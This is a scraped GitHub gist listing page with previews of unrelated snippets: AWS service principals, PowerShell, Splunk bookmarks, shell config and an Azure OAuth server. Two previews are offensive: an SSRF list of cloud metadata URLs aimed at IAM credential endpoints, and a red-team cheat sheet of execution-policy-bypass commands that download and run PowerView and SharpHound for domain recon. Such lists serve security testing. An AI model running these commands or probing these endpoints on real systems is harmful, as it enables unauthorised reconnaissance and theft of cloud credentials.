Skip to content

Instantly share code, notes, and snippets.

View jonz-secops's full-sized avatar

mrz-secops-offsec jonz-secops

View GitHub Profile
@shortjared
shortjared / list.txt
Last active June 26, 2025 12:00
List of AWS Service Principals
a4b.amazonaws.com
access-analyzer.amazonaws.com
account.amazonaws.com
acm-pca.amazonaws.com
acm.amazonaws.com
airflow-env.amazonaws.com
airflow.amazonaws.com
alexa-appkit.amazon.com
alexa-connectedhome.amazon.com
amazonmq.amazonaws.com
@lzybkr
lzybkr / Out-Default.ps1
Created March 21, 2018 21:38
Quick and dirty timestamp on output
function Out-Default
{
[CmdletBinding(HelpUri='https://go.microsoft.com/fwlink/?LinkID=113362', RemotingCapability='None')]
param(
[switch]
${Transcript},
[Parameter(ValueFromPipeline=$true)]
import urllib2
import httplib
import socket
import ssl
import sys
import requests
def MyResolver(host):
if host in vhost: #Vhost
@pwn1sher
pwn1sher / cloud_metadata.txt
Created April 25, 2018 07:31 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active June 17, 2025 05:00
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@mrts
mrts / markdown-to-slack.py
Last active March 28, 2025 21:48
Markdown to Slack
# Translates Markdown syntax to Slack, replaces:
#
# - hyphened lists with bullet symbols
# - double bold marker asterisks `**` with single asterisk `*`
# - headers `#` with bold marker asterisks `*`
#
# Run with
#
# python markdown-to-slack.py filename.md
#
<!DOCTYPE NETSCAPE-Bookmark-file-1>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">
<TITLE>Bookmarks</TITLE>
<H1>Bookmarks</H1>
<DL><p>
<dt><a href="https://splunkbase.splunk.com/">Splunkbase</a>
<dt><a href="https://git.io/splhighlighter">Splunk Highlighter</a>
<dt><a href="http://regex101.com/">regex101.com</a>
<dt><a href="http://strftime.net/">strftime.net</a>
<DT><H3 ADD_DATE="1551742873" LAST_MODIFIED="1553513798">.Conf Files</H3>
@TallonRain
TallonRain / config.fish
Last active February 14, 2025 04:08
Set up Fish Shell to use gpg-agent as the SSH agent for Yubikeys and other smart cards
# Add these contents to ~/.config/fish/config.fish
# If using Brew, config.fish is located in /usr/local/Cellar/fish/[version]/etc/fish/
# Generally recommend using the installer from https://fishshell.com instead of brew
# to avoid version updates overwriting the config file
# Start or re-use a gpg-agent.
gpgconf --launch gpg-agent
# Ensure that GPG Agent is used as the SSH agent
set -e SSH_AUTH_SOCK
@invokethreatguy
invokethreatguy / oauthServer.go
Created June 7, 2020 19:33 — forked from staaldraad/oauthServer.go
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
@GroupDocsGists
GroupDocsGists / DocumentMetadataCleaner.cs
Last active March 3, 2022 18:35
Clean All Metadata from Documents and Images
/*
* Clean all the detected metadata properties from Word, Excel,
* PowerPoint, PDF, and other documents using C#
*/
using (Metadata metadata = new Metadata("filePath/document.pdf"))
{
var affected = metadata.Sanitize();
metadata.Save("filePath/output.pdf");
}